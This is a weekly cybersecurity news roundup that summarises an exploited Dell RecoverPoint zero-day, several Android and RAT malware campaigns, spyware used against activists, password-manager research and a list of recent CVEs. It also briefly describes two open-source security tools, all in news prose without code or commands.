Security news rarely moves in a straight line. This week, it feels more like a series of sharp turns, some happening quietly in the background, others playing out in public view. The details are different, but the pressure points are familiar.
Across devices, cloud services, research labs, and even everyday apps, the line between normal behavior and hidden risk keeps getting thinner. Tools meant to protect, update, or improve systems are also becoming pathways when something goes wrong.
This recap gathers the signals in one place. Quick reads, real impact, and developments that deserve a closer look before they become next week’s bigger problem.
⚡ Threat of the Week
Dell RecoverPoint for VMs Zero-Day Exploited — A maximum severity security vulnerability in Dell RecoverPoint for Virtual Machines has been exploited as a zero-day by a suspected China-nexus threat cluster dubbed UNC6201 since mid-2024. The activity involves the exploitation of CVE-2026-22769 (CVSS score: 10.0), a case of hard-coded credentials affecting versions prior to 6.0.3.1 HF1. Per Google, the hard-coded credential relates to an “admin” user for the Apache Tomcat Manager instance that could be used authenticate to the Dell RecoverPoint Tomcat Manager, upload a web shell named SLAYSTYLE via the “/manager/text/deploy” endpoint, and execute commands as root on the appliance to drop the BRICKSTORM backdoor and its newer version dubbed GRIMBOLT.
.recap-link { text-decoration: none !important; color: inherit;}.recap-ad {display: flex ; flex-direction: column; max-width: 728px; margin: 40px auto; overflow: hidden; text-align: left; border-top: 10px solid #f2f6ff; border-bottom: 10px solid #f2f6ff; padding: 20px 0;}/* Image Styling */.recap-ad img { width: 100%; height: auto; border-radius: 10px; object-fit: cover;}/* Headline & Description Styling */.recap-ad h2 { font-size: 22px; color: #1a1a1a; margin: 15px 0 10px; font-weight: 600; line-height: 1.3;}.recap-ad p, .recap-ad div, .recap-ad ul li { font-size: 15px; color: #333; line-height: 24px; font-weight: 400; margin-bottom: 15px;}/* CTA Button */.recap-ad .button-style { background-color:#8a0020; color:#fff !important; padding: 10px 18px; font-size: 16px; border-radius: 6px; cursor: pointer; transition: background-color 0.3s ease, transform 0.2s ease; text-align: center; font-weight: 500; width: fit-content; display: inline-block; text-decoration: none;}.recap-ad .button-style:hover { background-color:#8a0020; transform: translateY(-2px);text-decoration: none;}
🔔 Top News
- Former Google Engineers Indicted Over Alleged Trade Secret Theft — Two former Google engineers and one of their husbands have been indicted in the U.S. for allegedly committing trade secret theft from the search giant and other tech firms and transferring the information to unauthorized locations, including Iran. Samaneh Ghandali, 41, and her husband Mohammadjavad Khosravi (aka Mohammad Khosravi), 40, along with her sister Soroor Ghandali, 32, were accused of conspiring to commit trade secret theft from Google and other leading technology companies, theft and attempted theft of trade secrets, and obstruction of justice. The defendants are said to have transferred hundreds of sensitive files to a third-party communications platform and then accessed them from Iran after Samaneh Ghandali and Khosravi traveled to Iran in December 2023.
- PromptSpy Android Malware Abuses Gemini for Persistence — Researchers at ESET analyzed what they described as the first Android malware to leverage generative artificial intelligence (AI) during its execution to set up persistence. Called PromptSpy, the malware uses Google Gemini to analyze the current screen and provide step-by-step instructions on how to ensure the malicious app remains pinned in the recent apps list by taking advantage of the operating system’s accessibility services. There are signs that the campaign is likely targeting users in Argentina. Google told The Hacker News that it did not find any apps containing the malware being distributed via Google Play.
- Kenyan Dissident’s Phone Cracked Using Cellebrite’s Tool — Evidence has emerged that Kenyan authorities used a commercial forensic extraction tool manufactured by Israeli company Cellebrite to break into a prominent dissident’s phone. The Citizen Lab said it found the indicators on a personal phone belonging to Boniface Mwangi, a Kenyan pro-democracy activist who has announced plans to run for president in 2027. In a related development, Amnesty International found that the iPhone belonging to Teixeira Cândido, an Angolan journalist and press freedom advocate, was successfully targeted by Intellexa’s Predator spyware in May 2024 after he opened an infected link received via WhatsApp.
- New Pre-Installed Android Malware Keenadu Detected in the Wild — A new Android backdoor that’s embedded deep into the device firmware can silently harvest data and remotely control its behavior, Kaspersky said. The malware, codenamed Keenadu, is said to have been delivered by means of compromised firmware through an over-the-air (OTA) update. This method allows it to run with high privileges from the moment the device is activated, providing attackers with extensive control over the device. It can also infect other installed apps, deploy additional software from APK files, and grant those apps any permission available on the system. Once active, Keenadu inherits elevated permissions and operates with minimal visibility. The malware triggers only under specific conditions, remaining dormant on devices set to Chinese languages or time zones and on those that lack the Google Play Store and Google Play Services. However, Keenadu’s distribution is not limited to pre-installed system components. In some cases, the malware has also been observed embedded within applications distributed through Android app stores. That said, there is very little a user can do when a piece of malware comes pre-installed on their brand new Android tablet. Because the malicious components are present in firmware rather than installed later as apps, affected users may have limited ability to detect or remove them through conventional methods. The activity has not been attributed to a specific threat actor, but Kaspersky said the developers demonstrated “a deep understanding of the Android architecture, the app startup process, and the core security principles of the operating system.”
- Password Managers’ Zero Knowledge Claims Put to Test — A new study undertaken by researchers from ETH Zurich and Università della Svizzera italiana has undermined claims from Bitwarden, Dashlane, and LastPass that the password managers guarantee “zero knowledge” — an assurance that states there is no way for a malicious insider or a threat actor that has compromised the cloud infrastructure to access the vault data. Specifically, it found that these claims are not true under all circumstances, particularly when account recovery is in place, or password managers are set to share vaults or organize users into groups. The most severe of the attacks, targeting Bitwarden and LastPass, could allow an insider or attacker to read or write to the contents of entire vaults. Other attacks enable reading and modification of shared vaults. “Attacks on the provider server infrastructure can be prevented by carefully designed operational security measures, but it is well within the bounds of reason to assume that these services are targeted by sophisticated nation-state-level adversaries, for example via software supply-chain attacks or spear-phishing,” the researchers said.
️🔥 Trending CVEs
New vulnerabilities surface daily, and attackers move fast. Reviewing and patching early keeps your systems resilient.
Here are this week’s most critical flaws to check first — CVE-2026-22769 (Dell RecoverPoint for Virtual Machines), CVE-2026-25926 (Notedpad++), CVE-2026-26119 (Microsoft Windows Admin Center), CVE-2026-2329 (Grandstream GXP1600 series), CVE-2025-65717 (Live Server), CVE-2026-1358 (Airleader Master), CVE-2026-25108 (FileZen), CVE-2026-25084, CVE-2026-24789 (ZLAN), CVE-2026-2577 (Nanobot), CVE-2026-25903 (Apache NiFi), CVE-2026-26019 (@langchain/community), CVE-2026-1670 (Honeywell CCTV), CVE-2025-7740 (Hitachi Energy SuprOS), CVE-2025-61928 (better-auth), CVE-2026-20140 (Splunk Enterprise for Windows), CVE-2026-27118 (@sveltejs/adapter-vercel), CVE-2026-27099, CVE-2026-27100 (Jenkins), CVE-2026-24733 (Apache Tomcat), CVE-2026-2648, CVE-2026-2649, CVE-2026-2650 (Google Chrome), CVE-2025-29969 (Windows Fundamentals), CVE-2025-64127, CVE-2025-64128, CVE-2025-64129, CVE-2025-64130 (Zenitel), CVE-2025-32355, CVE-2025-59793 (TRUfusion Enterprise), CVE-2026-1357 (WPvivid Backup plugin), CVE-2025-9501 (W3 Total Cache plugin), CVE-2025-13818 (ESET Management Agent for Windows), CVE-2025-11730 (ZYXEL ATP/USG series), CVE-2025-67303 (ComfyUI), and Joomla! unauthenticated file read, unauthenticated file deletion, and SQL injection vulnerabilities in Novarain/Tassos Framework (no CVEs).
🎥 Cybersecurity Webinars
- Learn How to Future-Proof Your Encryption Before Quantum Breaks It → Quantum computing is accelerating, and attackers are harvesting encrypted data for future decryption. This webinar covers practical post-quantum cryptography, hybrid encryption, and Zero Trust strategies to protect sensitive data before quantum threats become real.
- Beyond the Model: Securing AI Agents in Real-World Systems → As organizations deploy autonomous AI agents with tool access and system permissions, the attack surface shifts beyond the model itself. This session explores indirect prompt injection, privilege escalation, multi-agent risk, and practical strategies to secure real-world AI systems without breaking workflows.
- Pressure-Test Your Controls With Continuous CTI-Driven Validation → Security budgets are rising, yet breaches continue. This session shows how to move beyond assumption-based testing to continuous, CTI-driven exposure validation—pressure-testing controls against real attacker behavior, automating security checks, and building measurable resilience without overspending.
📰 Around the Cyber World
- Online Store Infected with Skimmer — The online store of a top-10 global supermarket chain has been infected with a skimmer malware that scans for admin users for WordPress, Magento, PrestaShop, and OpenCart to evade detection. “The attack combines two components: a seemingly off-the-shelf skimmer framework with integrations for four popular e-commerce platforms, and a carefully localized fake payment form,” Sansec said. “This fraud is called ‘double-tap skimming’: customers enter their card details into the fake form first, then see the real payment form where they have to enter their data again. Most people just accept that and complete the order, unaware their data was just stolen.” The breach coincides with a broader wave of attacks targeting PrestaShop stores. In January 2026, PrestaShop urged merchants to check their stores for skimmers injected into theme template files.
- Nigeria Arrests 7 for Running Scam Center — Nigerian authorities arrested seven suspects who ran a cyber scam center in the city of Agbor. The group used social media ads to lure U.K. victims to bogus crypto investment portals. Hundreds of fake Facebook accounts were potentially used to target victims. “Using these bogus social media accounts to impersonate cryptocurrency traders, they targeted people who used legitimate investment platforms, sharing false positive reviews to lure people into sending money to the fraudsters,” the U.K. National Crime Agency (NCA) said. Meta said it’s working with law enforcement to identify and remove all accounts used in these operations. “The group used fake social media accounts impersonating cryptocurrency traders, along with fraudulent Facebook groups featuring fabricated testimonials, to target individuals engaging with legitimate investment platforms,” it added. In the first half of 2025, the company noted it took down 12 million accounts across Facebook, Instagram, and WhatsApp associated with criminal scam centers.
- LonTalk Protocol Analyzed — Claroty has called attention to security risks posed by the LonTalk proprietary protocol that’s used for device-to-device communication in building management and automation systems (BMS and BAS). “LonTalk should not be underestimated as an attack vector for hacktivists and criminal entities, especially as BMS is enabled over IP networks,” the company said. “LonTalk is certainly still relevant to BMS cybersecurity discussions, especially as BMS finds its way online for a number of strategic and bottom-line reasons. Commercial real estate, retail, hospitality, and data center sectors rely on BMS systems such as HVAC (heating, ventilation, and air conditioning), lighting, energy management, and security. Previously, these systems were operated independently by facility management, but they are now increasingly connected and integrated through advanced BMS and BAS capabilities.”
- GrayCharlie Uses Compromised WordPress Sites to Deliver RATs — A threat actor known as GrayCharlie (aka HANEYMANEY, SmartApeSG, and ZPHP) has been observed compromising WordPress sites and injecting them with links to externally hosted JavaScript that redirects visitors to NetSupport RAT payloads delivered via fake browser update pages or ClickFix mechanisms. The threat first emerged in mid-2023. “These infections often progress to the deployment of StealC and SectopRAT,” Recorded Future said. While most compromised websites appear to be opportunistic and span numerous industries, the cybersecurity company said it identified a cluster of U.S. law firm sites that were likely compromised around November 2025, likely through a supply chain attack involving a shared IT provider.
- Why Patch Everything is a Recipe for Burnout — Dataminr’s 2026 Cyber Threat Landscape Report has revealed that the “patching treadmill is broken,” driven by reliance on CVSS scores and a surge in patch bypasses, where vendors don’t address the root causes of issues, thereby opening the door to re-exploitation by threat actors days or weeks after the initial patch was released. “With thousands of CVEs disclosed every year, security teams can’t just rely on the common vulnerability severity score (CVSS) to decide what to patch,” Dataminr said. “These scores focus on the technical impacts of a vulnerability, but tell you very little about actual risk to your organization. There has to be a balance between the CVSS, potential economic impact, exposure, and likelihood of being targeted. The focus has to shift from ‘is this a critical CVE?’ to ‘is this specific flaw being targeted in my sector, and can the attacker actually reach my crown jewels through it?'”
- Phishing Campaigns in Taiwan Deliver Winos 4.0 — Targeting phishing campaigns have targeted Taiwan with themes designed to exploit local business processes and ultimately deliver a known remote access trojan called Winos 4.0 (aka ValleyRAT) and malicious plugins through weaponized attachments or embedded links. “The lures mimic official communications, such as tax audit notifications, tax filing software installers, and cloud-based e-invoice downloads,” Fortinet FortiGuard Labs said. “Over the past two months, we have identified various delivery techniques, including malicious LNK files used for a downloader, DLL side-loading via legitimate executables to load shellcode, and BYOVD (Bring Your Own Vulnerable Driver) attacks using ‘wsftprm.sys.'” The driver is used to terminate processes associated with a hard-coded list of security products. The use of Winos 4.0 is unique to a Chinese cybercrime group known as Silver Fox.
- Teams Gets Brand Impersonation Protection — Microsoft said it will start rolling out Brand Impersonation Protection for Teams Calling starting mid-March 2026 to detect and warn users of suspicious external calls to reduce fraud risks. “It will be enabled by default, requires no admin action, and aims to enhance security without changing existing policies,” Microsoft said. The tech giant is also planning to introduce a “Report a Call” feature by mid-March 2026 to let users flag suspicious one-to-one calls.
- 2025 Records 508 ICS advisories from CISA — Between March 2010 and January 31, 2026, CISA/ICS-CERT published 3,637 ICS advisories about 12,174 vulnerabilities affecting 2,783 products from 689 vendors, Forescout said. 2025 recorded a high of 508 ICS advisories, covering 2,155 vulnerabilities across various products and vendors. The development marks the first year exceeding 500 advisories. The average severity rose to a CVSS score of 8.07 and 82% of advisories were classified as high or critical. In contrast, back in 2010, the average was 6.44, and it was classified as medium severity.
- Microsoft Unveils LiteBox — Microsoft has released LiteBox, a Rust-based project described as a “sandboxing library OS that drastically cuts down the interface to the host, thereby reducing attack surface.” Developed in collaboration with the Linux Virtualization Based Security (LVBS) project, the goal is to sandbox applications by minimizing host system interactions and supporting various use cases like running Linux programs on Windows or sandboxing Linux applications.
- ChainedShark Targets Chinese Research Sector — A new APT group codenamed ChainedShark is targeting China’s academic and scientific research sector. Active since May 2024, the group’s main focus has been the collection of intelligence on Chinese diplomacy and marine technology. Past victims include universities and research institutions specializing in international relations. Its arsenal integrates N-day vulnerability exploits and highly complex custom trojans such as LinkedShell. “ChainedShark exhibits clear geopolitical motivations, focusing its attacks on experts and scholars in international relations and marine sciences within Chinese academic and research institutions,” NSFOCUS said. “The group demonstrates strong social engineering capabilities, crafting fluent, natural, and high-quality Chinese-language lures. It skillfully exploits professional scenarios—such as conference invitations and academic call-for-papers—to create deceptive attack vectors, effectively lowering targets’ guard.”
- Samsung Weather App as a Way for User Fingerprinting — New research has uncovered that Samsung’s pre-installed weather app is fingerprinting its users by means of a “placeid” parameter that’s trivially observable by the weather API provider. A test conducted on 42 Samsung devices found that the fingerprints were unique per device and survived IP changes across providers and VPN use. “Analysis of 9,211 weather API requests from 42 Samsung device owners over five days demonstrates that placeid combinations produce unique user identifiers in 96.4% of cases,” Buchodi’s Threat Intel said. “Every user with two or more saved locations had a fingerprint shared by no one else in the dataset.” This, in turn, turns saved locations into a persistent cross-session tracking identifier, as each placeid identifies a unique location. The fingerprint represents an aggregate of all placeid values associated with a device’s saved locations. In other words, a user tracking a combination of more than two or three locations can be uniquely identified.
- DDoS Attacks Jump 168% in 2025 — A new analysis released by Radware has revealed that the number of web DDoS attacks climbed 101.4% in 2025 compared to 2024, and bad bot activity increased 91.8%, fueled by generative AI tools. Malicious web application and API transactions rose 128% year over year. Network-layer DDoS attacks increased 168.2% year over year, with peak attack volumes reaching almost 30 terabits per second (Tbps). “Technology, telecommunications, and financial services were the most targeted sectors, together accounting for the majority of large-scale network DDoS campaigns,” Radware said. “The technology sector alone represented 45% of all network-layer DDoS attacks, up sharply from 8.77% in 2024.” Hacktivism, fueled by geopolitical and ideological conflict, remained a primary driver of DDoS activity.
- Over 2,500 Malicious Images Flagged on Docker Hub — Qualys said it discovered more than 2,500 malicious images hosted on the Docker Hub. Of these, around 70% of them contained a hidden cryptominer. Others included backdoors, exploits, ransomware, keyloggers, and proxy infrastructure. “Pulling container images from public registries is no longer a neutral operational step,” the company said. “It is a trust decision that directly affects infrastructure stability, cloud costs, and security risk.”
- Nearly 1T Scam Ads Served on Social Media in 2025 — According to new findings from Juniper Research, online tech platforms made £3.8 billion ($5.2 billion) in revenue from malicious or scam ads in Europe alone. Nearly 1 trillion scam ads were served to social media users in 2025. The analyst firm also revealed earlier this month that e-commerce fraud will rise from $56bn in 2025 to $131 billion in 2030, posting a 133% increase over the period.
- Malicious npm Packages Hijack Gambling Outcomes — Researchers have discovered malicious npm packages, json-bigint-extend, jsonfx, and jsonfb, that mimic the legitimate json-bigint library, but contain functionality to install two backdoors to execute additional code fetched from an endpoint, run arbitrary SQL commands, download file contents, and list server-side files and directories. “Upon further inspection of the fetched code, it seems to be a complex cashflow-rewriting system used to manipulate a gambling game,” Aikido said. “The most sophisticated component of this backdoor is the fixFlow function, a balance manipulation engine that retroactively rewrites a user’s gambling history to achieve a desired balance change while maintaining the appearance of legitimate gameplay.” It’s suspected that the malware is designed to target a gambling app named Bappa Rummy. It’s no longer listed on the official Google Play Store.
- Telegram Disputes Claims About Encryption — The head of Russia’s FSB security service accused Telegram of harboring criminal activity and failing to act on reports from Russian authorities. Bortnikov said Telegram ignored more than 150,000 requests for removal from Russian authorities. Russian officials also claimed that foreign intelligence services could read messages sent by Russian soldiers over the app. The messaging platform said “no breaches of Telegram’s encryption have ever been found.” The development comes as Russia started blocking and throttling Telegram traffic last week.
- Nigerian Man Sentenced to Eight Years in Prison for Bogus Tax Refund Scheme — A 37-year-old Nigerian man named Matthew A. Akande, who was living in Mexico, was sentenced to eight years in prison in the U.S. for his involvement in a criminal operation that involved unauthorized access to the computer networks of tax preparation firms in Massachusetts. Between in or about June 2016 and June 2021, Akande conspired to use stolen taxpayer information to file over 1,000 fraudulent tax returns seeking millions of dollars in tax refunds, the Justice Department said. The defendant was also ordered to pay $1,393,230 in restitution. He was arrested in October 2024 in the U.K. and extradited to the U.S. in March 2025. “To carry out the scheme, Akande caused fraudulent phishing emails to be sent to five Massachusetts tax preparation firms,” the department said. The emails purported to be from a prospective client seeking the tax preparation firms’ services, but in truth were used to trick the firms into downloading remote access trojan malicious software (RAT malware), including malware known as Warzone RAT. Akande used the RAT malware to obtain the PII and prior year tax information of the tax preparation firms’ clients, which Akande then used to cause fraudulent tax returns to be filed seeking refunds.” Warzone RAT’s infrastructure was seized by the U.S. Federal Bureau of Investigation in February 2024.
- New Campaigns Distribute njRAT, Pulsar RAT, XWorm, and Prometei — In a new campaign, threat actors are leveraging the njRAT remote access trojan to deliver the MassLogger infostealer. Another campaign has been found to use a Donut loader to distribute Pulsar RAT as part of a sophisticated, multi-stage malware attack. What’s notable about this activity is that Pulsar RAT is used to actively control a compromised host, allowing an attacker to initiate a real-time chat session with the victim to interact and probe system usage. Also discovered are two campaigns using phishing emails to distribute XWorm: One uses a JavaScript dropper to target Brazilian users, and another begins with phishing emails delivering a malicious Excel attachment to targeted users. The Excel file exploits CVE-2018-0802, a memory corruption flaw in Office patched in 2018, to download and execute an HTA file on the victim’s device, which, in turn, triggers PowerShell to download and run a fileless .NET module directly into memory. The module then uses process hollowing to inject and execute the XWorm payload within a newly created MSBuild.exe process. Last but not least, Windows servers are being targeted by threat actors to infect them with a botnet known as Prometei. “It features extensive capabilities, including remote control functionality, credential harvesting, crypto-mining (Monero), lateral movement, command-and-control (C2) over both the clearweb and TOR network, and self-preservation measures that harden compromised systems against other threat actors, to maintain exclusive access,” eSentire said.
🔧 Cybersecurity Tools
- Gixy Next → It is an open-source security analysis tool designed to audit NGINX configurations for common misconfigurations and vulnerabilities. It scans configuration files to detect issues such as unsafe directives, incorrect access controls, and insecure proxy settings that could expose applications to attacks. Built as a successor to the original Gixy project, it aims to provide updated checks and improved rule coverage for modern NGINX deployments.
- The-One-WSL-BOF → It is an open-source Cobalt Strike Beacon Object File that lets operators interact with Windows Subsystem for Linux (WSL) directly from a Beacon session. It can list WSL distributions and run commands inside them without launching wsl.exe, reducing visible process activity and some logging artifacts.
Disclaimer: These tools are provided for research and educational use only. They are not security-audited and may cause harm if misused. Review the code, test in controlled environments, and comply with all applicable laws and policies.
Conclusion
If one theme runs through this week, it is quiet exposure. Risk is showing up in routine updates, trusted tools, and features most teams rarely question until something breaks.
The real issue is not a single flaw but the pattern beneath it. Small weaknesses are being chained together and scaled with automation faster than defenders can adjust.
Scan the full list carefully. One of these short updates will likely map closer to your own environment than it first appears.
